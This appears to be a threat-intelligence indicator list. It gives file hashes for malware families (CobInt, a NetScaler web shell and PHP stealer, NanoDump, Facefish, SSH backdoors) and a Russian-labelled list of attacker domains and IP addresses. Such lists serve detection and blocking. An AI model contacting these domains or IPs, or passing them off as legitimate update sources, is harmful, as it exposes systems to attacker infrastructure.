d649055cc890b139e00eabe0b207df147fa2ec630c17fb2575047b2593b288f5 7772d7b4a94583559efdb0166f0ed08a758aed38 16695c4db4b4a658610f0849583b32ef

CobInt MainModule

cc8e3972bc0eee922303c6d8c031037f8ebaf39c710071b4760a033b0b90fce6 ca705f5b62cda3522f4f8b802b9bee9c6561741f 2372c6e4f2fd9800783d69061d419b4f
f8f55dc98583aa1fed3e8a57c210d0e1797967c97538cdf08c0699d47a1c0ccc b8add4ccaa68ca2a112423c1029279a65572052a da633b55569cbf99dc10814ac546afba
6ac5dd9d629e696a43d9adcdd5d7bd2269fe3d2f69f7cac3323a27738435ab4f d841aa317b166751b013dfb56c6541ce0075054b c61e726fc5d3d6bcb3f5be78f2f8dac8

Web shell

ctxHeaderLogon.php

faf37bcbbcaff2de3e4b794bb9eed9e47505cdbed3a35b83ce9a216298779c62 bf3899623dcb17260137fbd88866938bb6eba826 dd0c57950f0ce4425a8fb4bac7af6aea

PHP stealer

netscaler.php

886f3add934cb8e348dcfac78d9e0e50d6d760d065352bc8026529a6bb233279 1a6b65c68fb23ba1e09bfe9ee4cc3d497e72ff35 34c203634f1e5343396b59f3316f6624

NanoDump

nano.exe

1d338978885d8d5effa0ebd9f9dbe2a5eb86494e973c21df96426b2fa428993b bac24f99eda386eb8044f22e5728479138287622 632bf2d5516930765d453daa184e02c0

Facefish

libs.so

e79b708990fc39ce917fbca45e9526a7bb7851d7edb52a6b04b5d5e460310308 6a7fb0dd0b681ad9bacc95c796d0d0c27840f219 f90fab637c0e899507ae9f3e8f8bbd13
04002de7b9a9364f509090084c65d8e72a59c0ecc307759478d039ec8ba1a567 4658240e06b80a8c85b4222ea4140494b2b9b10d 82e645991a02f7b55d30875cb0443f89
1952d5471d9849d371f4f7b8963e19b58a4ab297f1b9cd7389743d7e701b104e b58488fe15399881c4ba982016f770c8be630528 61b0adf3dab8ab7d660268e6fe8d940b
1a3199d35e84df4598becf234b4ec39f3a30aabb7b6e1002f2016072554961b4 66dd0b893bf3eb8f4eea2962d18a5712109a98fa ebcf4bfb9e997e0c9270ca1a9e1fd417
1af1088e540ee1e41da42ff94e75339c3176125e67ed50d3257a3fce863de210 f349c69495ffcca5fe4aab9d8b1fa5efdac001ea 8869ff3503ae8c9f91e826ae745cfafa
1b98f6cfc3d548034d6c58f215aa10553b53af70025d81f606207a2ce89a2c58 03b240396cd01bc138afc97932b04089b88289be d8e795e75dd2a56b050236a50b066887
1c7fb07e83d97890baa9edd0ae3e0e1ff0b2577901b502fd0fac5a5b4d0c4ef8 19986eee3e63d04265e274309d9fce80436e7ea0 b460d41fd801424e4bbe7dce8c3ead6b
1f17cef416f2c8d9549ea301687440e8fd9e4f48787ffd28d44c1070326fc10a eee7fbc8c4faf705c3dcc816fd0341525031ec57 4b0803d70a220a66f5663672f1d4c07f
222b648a83900c30d3d32fa53bad16518198ce81f3c63a8c5724413bdd38a9d2 9e90dd1022e0d04950a186ce7fd85a949b733e6c e6201d9a55cbafbbed5df49ada48f42f
2adf2242ff63b01094b8940be5d3d32a099410cef6b6a2fa4917ce59cf55f225 b94311ee720047f8f74e14f45d970b21ac66f4a2 699bf98ae6366f077c875772d6fecefc
2c5707e54fa639b160e19851cc9276f486dfdef559f3679ecb313c02440ef344 27820cba6fd6763ce4ab9eb06a04aedd28754e48 a809cb705a1b197b0042a0fb38d3cde6
2e91e51ee2a0e1142ef4ced4b9134214771421e484a12487f0b422ebe2aab494 7aaa0796767b77f191876d374c8f268699d8ca07 9258550437d849f3b8f16cfd87891054
4ca880437f0f3256861433c7433ead6db932be13ce8064fd76d8e12f462ab5d9 2eb3ec0de0a6e070652b03d5005718f23a94d546 ea75e0b2ece364e97256808ca4c24d80
56ce53b6c32beacd8864258c81bf276304a8da20bc0011f5e09d37b95a3e5def 311f4dc517102691488ef38792cf57b96c54272d 8e211159f28dd92f2eb73dddcc661e7d
571003554c953f190b3030dd98a60203ba2a724520ba039bdb82c71c426595a7 6bffbac7267109228de10cdd4e9fa791496fb9b9 0d6faac08764bf368c8133ce79acd8e0
58c49dc1dc8c6bdb85985ae0918e9717045b9e80db5f4b1758ac5b20ad3230c7 0f2d92f0ae10497589a29c6922d330c86e198cc8 cb81071a8ab5c6ad2c0bbfc78ce425a7
5bda73410e001727742776de169d508753e6ec129c2db5f12aa80a1bab7bdd3c ab1241788953a5cf80eb3cff7ffaeafd6015c95e 741ff27baf97b9d8706439e44b32fa55
5d3b5b18fbe6310cf41d45d00012c0a3bcc8a8de6c7140ce574130fa118165b5 369f1b8466071ad38fb11b57faac93581c28b3b5 d6ece2d07aa6c0a9e752c65fbe4c4ac2
5ddc96f5c12df7956ba3b8b9a0cec28edfb41cde0be0e9201104d5606ec29bfd c89482c1cad2e310520a7b09b75432af58a9f904 8ee46eebfe1d062e25b34ae0a39eb4dc
80b953276a7c3e45ae1493ce73539cfb55d33740bfaadc5a7ff39ea81a99a02c c71674522fcd9e59be922e74143c6f2605e88440 bb0dd8f139dff25bf0299e431652abac
815687d4f48188b65c234fcd8b6c29b0cbc101fedbdb7b2a4f9835c9f628e59e 986c51484ac75257d771e4b5b93b95beec05744f 4afe107cc3bcb6efe7c0e21a171f89b1
82a9f9bce040abf27d833520a92c469340e1939e1609d36bb926bcd22ce466d9 41a90b533931314a261dbdc1a694240ee4ccc141 ef6586db892316ce1bebc1f77c7b5165
86bb89e1f3e71973674360b564d48f041114a2d5956e35152fd60b518dd2c7ce 03b0ea28523cb1c12d7925454ae972c1a9817b03 438cd8fd8d8c42f7ca639d9d2d8e79d9
8ad8ee8a748daf62235a541fafd6625ce066892bc8890b1ebbe5c95a9b194559 79d696227754b1e704d0e466735e0fff5b73836f 40ac792834656304daaf43a57ca8cb98
8aded9ff1f808541db0c5c377a4a3bb7a27c69ef95a203a1433f5e90ea7119e0 25b143f37057b8567c9d65aa4439515f068398f4 7c4891c5ea1bc0f03ab6792991821dda
8f32c8f40290417c512612cdc33ef25e760bcd96edef60b9458c2fff7cf45f07 523eab1c3cfd0233001f6e88eb0ff277d5366828 67e75d20e29e470ec05366ba760cdaaa
9227ae0e3e74d72c0cb06e90f3adfab111241defcaa2c736429269edc8153515 bd0dfae3da23970ae0cb0c64cb8a7ad0c6a1c627 7f47738ce4ef7708392cd7776da1c213
b7f36ffaf9057f80f9124c0be5fae66011af05887e1090020fadc3c2b2ac0322 865e82aa9498b3291a5190fdf3c1859e6ba4467b ae815a8e0eca62c6dccdef1896f15a98
c4c192aa64c4467309ec41f47858f4bdc9bef1d9e054964459b46816d3d89a10 79867a2d1dfd29d759b457a2210e8c8c1d5a9210 790870f96208d448522f0b1b5fbf3c08
d9a25ac036975148fdb6069382701bf90e3cc8f1028ad97e4531857644590665 5b453ebad7935cfff28d83d69bcc4bb0db4ade93 b7bfbc7f3188e11a090655fd9a69b5ae
f51e83a53dd3a364709b1d0b93489f7a114b529268c3bab726ed288eba036bca 6d7f5acb282c8f2ddfbc9b92f85c055ae6fbd69a d904e85354ae4019a818e251a31efcfc
f9022639a4a8b361497bb68dab09c5386205ede7108824493e0b722f786a73ee bda89000a5d0bee8516b0041a1d70cc9039b5924 4ae7bbf0d7e0f3006c6e109c5204f031
fc962c3ef76527e7310f36b4a2a046b7e0c6287a6bdd8b9fe187162f7bb38658 3622f85a85dd77f4553e7677c6c42edec5f16747 bafa89c6eeb352d26651d8446481d636
670cb4c0eecf5d43f264c8fdf06d83d64022de07ca14da74e393f99a374283d4 286d3bfca62b3ebe59f3b45d5f7e2349ccc411bc 1db16cfaf3bed9915277f92112e2a950
76ac7901747b809001fb9e69151c93a258bdb44614b65141ca7a1c750a75442e cb70155e8f3a016ab9d360019bb85477aee25f0e 6d7f7d6ad3f4421f41057d25627c8324
91a125da02c7958b21d93c0b2ebf843086be50f69b8a7330da8440d911bdb3ad fcc5e457b835613485104df5011f85e8ac3f266b cf31771a9f75aae6a74013edb87120ee
936ca431d17d738beab9735a3d6e658ff29f8337f52353fd60e286c94dd2c06b 04958d06c7300efaac9f21b877957048e28e2198 8a11e27b749624bedb2cfe24d30103a8
e2867fe7c85c02942df27d4c001db3889b9373ff38a1e80bae852a0dc3ce480d 1ad3fc0c9856391362fa2c96f48e833b37784e36 4ecea6e9ffb8197766ae4cd144f9a73d
e687c9291818f280c37a3e43a7dbf2b6c3f2cabd72a014b63cf3332fdc707753 7b3f84da6ccb820882645fd199ead782eddb97bb bc0e8ef8eb7ecaa6571a9be9998c407e
948b6c5fc1ba74ed57388241d1e8656e0ca082d10ff834c628d01c592764926d 3d43a6cf71d7a36a6bf6be24eba59dbe1b67187b eec106e4850359e3c99769d6463cffc2
2c6388cd037305587b087467407fdb6cc46d4fd57eb125ea7d2486a231adb7fa 69e459e79141de203ddd1031572de0453fe11814 c41e21b672725ecb403aacf684f80d43
76045064afabaa67903b4c261b86813a7bd8b326d08bd118adabb8695ae34c1f 4868ffbe97250068d1e1ad55617585ea92a7e80b c592dae9a8113352627d6b39c97e7df8

ssh1200

8b7f948434a6b8110b1a9aa2d909d58cff29cbc1e1169aabea4aefddcf5047d8 96e06691a3c430aac9c43a2bb2b347dda88e4ade 45849dabbeff5e80c8acd51ac9662748

ssh3600

42c3920bcece0fcdbb5060be7d5f46effeaaa14971de0f31f824b53029568cb8 b38096a7d8614ca5c63a71baf030b6d035db0891 49afe50aa8061ae5d3e4eb3f62e06ab3
90013bb9f389c316e3df3ad8b57a837cd84f80a509a086618b9dce18e82d4244 aefa624ca63b8cd69960972f7e3f3fa5fbf30f5c 5e25ffb58c8ce10bb06daaeb41ccfe8f
c50bd9865ed65a9c298768f245d8eaff1baa410735ff5673a73d1411c425b7c6 f68370b3b55fb0d1958b4c132b7722b39672f1bf bfc23a5da6890c8f81abb7d918090e69

sshins

ab9cc4ee82aa6f57ba2a113aab905c33e278c969399db4188d0ea5942ad3bb7d f7d95a887a51fe97ce64a93a40196b2cccaa80d8 38fb322cc6d09a6ab85784ede56bc5a7
c787e57a8077f0df838ae416cbf6dd38ecc670e532c3369bff2ef571cd94d36e 79361214b0508e620b568414c4ae0d4b00e885a2 63dc3037bf0022e2d281f0463529bf60
c8df513e9e4848e35af5246a2ba797540b68a9379a1df17e34550cb0258960e8 65730632bb30583f0a406afd1153840367db8f1b 601c24c1ea5c38d47dd008260c510ecd

Сетевые индикаторы

Domain
420021.com
avptp.com
deadork.com
download-attachment.xyz
eu-debian.com
fsbkal.com
getanaccess.net
infousa.xyz
kavupdate.com
knlrgb.com
linuxupdate.live
lib.rpm-bin.link
logilokforce.com
mirror-update.org
msngrt.com
onepostlive.com
ptnau.com
saakashvili.com.ua
ukr-net.website
updateld.xyz
winkb0172.com
wsusa.xyz
stoloto.ai
IP-адреса
64.226.104.111
51.15.18.85
138.68.138.197
146.190.23.86
157.245.37.121